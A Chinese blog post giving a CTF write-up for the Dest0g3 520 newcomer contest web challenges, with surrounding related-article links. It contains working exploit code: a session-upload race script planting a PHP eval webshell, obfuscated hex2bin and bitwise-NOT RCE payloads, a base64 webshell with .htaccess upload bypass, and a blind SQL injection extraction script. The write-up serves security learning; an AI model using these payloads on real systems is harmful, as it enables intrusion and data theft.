Dest0g3 520迎新赛

最新推荐文章于 2022-07-25 16:24:56 发布
最新推荐文章于 2022-07-25 16:24:56 发布
阅读量306 收藏 1
点赞数 2
分类专栏: ctf 文章标签: web安全 php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52988816/article/details/125221761
版权

这两天期末,发点存货
phpdest
文件竞争

import requests
import io
import threading
url = "http://a44e2fb2-5cb3-4f96-a03f-9657dedc9a39.node4.buuoj.cn:81/"
sessionID = "flag"
data = {"cmd": "system('cat flag.php');"}
def write(session):
    while True:
        f = io.BytesIO(b'a'*1024*50)
        resp = session.post(url=url,data={'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST["cmd"]);?>'},files={'file':('flag.txt',f)},cookies={'PHPSESSID':sessionID})
def read(session):
    while True:
        resp = session.post(url='http://a44e2fb2-5cb3-4f96-a03f-9657dedc9a39.node4.buuoj.cn:81/?file=/tmp/sess_flag',data=data)
        if 'flag.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            print("=========retry==========")
if __name__ == "__main__":
    event = threading.Event()
    with requests.session() as session:
        for i in range(1,5):
            threading.Thread(target=write, args=(session,)).start()
        for i in range(1,5):
            threading.Thread(target=read, args=(session,)).start()
    event.set()

EasyPHP

set_error_handler(
    function() use(&$fl4g) {
        print $fl4g;
    }

数报错然后输出 flag
ctf[]=123

SimpleRCE
hex2bin 绕过
https://www.pudn.com/news/62809145ebb030486d479342.html
可以看一下,里面有
最后执行的是
aaa=hex2bin('73797374656d')('head /f*')

另一种方法
法二
最开始考虑的是无字母 rce,但发现或和异或都被 ban 了所以考虑—url取反绕过

<?php

fwrite(STDOUT,'[+]your function: ');

$system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));

fwrite(STDOUT,'[+]your command: ');

$command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));

echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
payload
aaa=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%D5);

funny_upload
对文件类型进行了检测,改为jpg文件后,又对文件内容进行了检测不能有<?,所以采用了base64结合.htaccess伪协议的方式进行绕过

1.jpg
PD9waHAgZXZhbCgkX1BPU1RbYV0pOz8+
.htaccess
SetHandler application/x-httpd-php
php_value auto_append_file "php://filter/convert.base64-decode/resource=1.jpg

上传成功后蚁剑链接即可
Really Easy SQL
sql盲注,sleep被过滤,用benchmark

import requests
import time
url="http://fec87fc0-85b0-4969-a9d2-7328b18dc98b.node4.buuoj.cn:81/"
flag=''
for i in range(1,50):
    m=32
    n=127
    while 1:
        mid=(m+n)//2

        #payload="0'or(if((ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{},1))<{}),benchmark(2000000,md5(1)),0))or'".format(i,mid) #flaggg,user
        #payload="0'or(if((ascii(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name='flaggg')),{},1))<{}),benchmark(2000000,md5(1)),0))or'".format(i,mid) #cmd
        payload="0'or(if((ascii(mid((select(cmd)from(flaggg)),{},1))<{}),benchmark(2000000,md5(1)),0))or'".format(i,mid)
        data={
        'username': 'a',
        'password': payload
        }
        print(data)
        try:
           r = requests.post(url=url,data=data,timeout=1.5)
           m=mid
        except:
            n=mid
        if(m+1==n):
            flag+=chr(m)
            print(flag)
            break
        time.sleep(0.2)
    time.sleep(1)
XINO丶
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
WebDest0g3 520迎新 题解(全)
uuzeray的博客
04-16 1280
通过故意将文件名和目录名混用,以及改变一个项目在文件系统中的类型(从文件到目录),来创建一个难以解压的ZIP文件。在Cookie处rO0A起手,明显是java序列化的base64编码,可以打入反序列化。打靶机,解压失败,但是其是在解压出部分文件后直接exit,从而绕过后续的unlink。这题估计也可以打php://input和日志包含,感兴趣可以试一试。生成的phar文件在010editor中打开,删去最后一个}D这个类对文件可以写可以读,用来打phar反序列化。访问/tmp/jyh.php回显404。
Dest0g3 520迎新Misc Pngenius WriteUp
weixin_46025603的博客
05-27 318
开局一张图片,老规矩binwalk分析一波。 binwalk 11.png 隐写了flag.txt,flag应该就在里面。 binwalk -e 11.png 把文件提取出来 压缩包先看看是不是伪加密,不然上下其手一番后,发现他是伪加密=_= 看来是真加密,下面想办法得到压缩包密码。 能开锁的除了钥匙,还有锤子呀_ 暴力破解一下,看着逐渐诡异的payload。。。此路不通,换个方法 那密码应该就在题目给的文件里。 再回头看看开局的图片,丢进stegsolve看看有没有LSB隐写 找到你啦! We.
Dest0g3 520迎新 | root 新生
qq_32284207的博客
06-01 708
题解 费马分解 babyAES 题目 题解 ezStream 题目 题解 爆破求seed2 求flag ezDLP 题解 sage离散对数 Mr.Doctor 题目 题解 seed1、seed2 seed flag Bag 题目 题解 学习参考 学习参考 FourThousandRSA 题目 题解 NSSCTF原题,脚本小子🤔(事后具体复现) misc EasyEncode 爆破压缩包密码100861 摩斯码 hex py print() url base6
Dest0g3 520迎新(上web
qq_62046696的博客
07-08 326
打开界面看见require_once,自然想到require然后include,确定了这是一道文件包含的题目, 然后看见第三行 require_once已经包含了,flag.php,最后require_once肯定也是包含flag.php,但是这个once只能包含一次所以我们就要绕过,想了一下用filter伪协议读取flag。php试一下 发现仍然是原界面,没任何回显 重复链接绕过 base64解码即可打开界面代码如下 构建数组报错POST:ctf[]=1,看见fl4g后面有点连接符,因为下面
Dest0g3 520迎新web&misc
weixin_63231007的博客
07-19 1287
Destog3 520迎新web&misc题目复现
CTF真题-Dest0g3CTF2022招新
06-01
CTF真题-Dest0g3CTF2022招新,来自BUUCTF。
Dest0g3-Java部分1
08-03
Dest0g3-Java部分1
oracle数据库设置db_recovery_file_dest_size参数为0
11-02
当我们设置数据库的归档路径时,就没有必要在使用db_recovery_file_dest参数,可是如果db_recovery_file_dest_size的值不为0,那么该如何设置呢?
DEST戴尔服务器硬件日志收集工具
04-02
1.本工具为DELL服务器官方硬件日志提取工具,不是安装程序,请直接运行"dsetreport.hta"即可,运行时长大约5~15分钟,运行期间请关闭杀软等; 2.本程序可以在不关机的情况下完成服务器错误日志的收集;...
Dest
03-17
Dest
Dest0g3 520迎新 Misc EasyEncode
weixin_46025603的博客
05-27 386
拿到压缩包,先看看是不是伪加密 真加密 字典跑一下 密码100861 摩斯密码解密一下 这么多重复的5C753030…!数学专业学生的DNA动了啊,这不16进制吗? 但是这么多重复的,这串密文解密后也还是有这么多重复的东西。什么加密方式会产生重复的东西呢?那不就是unicode吗? 上脚本 cro_16 = input("请输入一个16进制字符串数组:") start = 0 cro_16_item = cro_16.split("5C") for j in cro_16_item[1:]: .
# Dest0g3 520迎新(更新中)
xiao_he0123的博客
07-25 342
Dest0g3 520迎新
Dest0g3 520迎新WP
Praise_me的博客
05-29 860
Dest0g3 520迎新部分题目Write_up。
Dest0g3 520迎新 个人复现Writeup
m0_61596829的博客
06-01 1488
Dest0g3 520迎新 Dest0g3首次招新啦! Dest0g3 Team现逐步发展到各大高校及安全公司均有成员分布,在过去的半年里先后取得L3HCTF第十、SCTF第六及SUSCTF第四的优异成绩。 首届Dest0g3 520迎新更加注重CTFer的基础知识面掌握程度,由易到难,适合各学习阶段选手参加,纯萌新水准。 Dest0g3期待更多新生力量的加入,如有意向请在后提交wp与简历,或联系@Dest0g3 Team (QQ:1115230222) 比时间:2022.5.20 10:
Dest0g3 520迎新 writeup by 树木
JEWSWS的博客
05-29 3455
信息 用户名:树木敲阔爱 类型:分榜前三 排名:25 MISC Welcome to fxxking DestCTF 关注微信公众号,得到flag Dest0g3{W31c0m3_t0_DestCTF2022!} Pngenius 题目是一张PNG图片,很难不让人联想到隐写术,我们使用stegsolve打开 在R0G0B0发现了Password for zip,猜测图片包含ZIP,使用foremost进行分解 分解后发现有密码,使用刚刚解出来的密码解压,得到flag
Dest0g3 520迎新 writeup (misc部分 + web部分)
ShenZ的博客
05-30 2501
Dest0g3 520迎新 Welcome to fxxking DestCTF 你知道js吗 StrangeTraffic Pngenius EasyWord EasyEncode Python_jail rookie hacker-1 rookie hacker-2 4096 EasySSTI phpdest EasyPHP SimpleRCE funny_upload middle PharPOP 1.phar的上传与触发 2.POP链 NodeSoEasy ezip Really Easy Sql
buuctf:Dest0g3 520迎新 web EasySSTI
qq_29060627的博客
06-10 629
python flask ssti绕过过滤注入 ctf web
from Crypto.Util.number import * f = open('flag.txt', 'r') flag = f.read() f.close() assert flag[:8] == "Dest0g3{" 这段代码的作用
最新发布
07-12
这段代码的作用是: 1. 导入 `Crypto.Util.number` 模块,该模块提供了一些与数字相关的密码学功能。 2. 打开名为 'flag.txt' 的文件,并将文件内容读取到变量 `flag` 中。 3. 关闭文件。 4. 使用断言语句(`assert`)检查变量 `flag` 的前8个字符是否等于 "Dest0g3{"。如果不相等,将引发异常。 综上所述,这段代码的目的是读取名为 'flag.txt' 的文件,并确保文件内容的前8个字符是 "Dest0g3{"。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值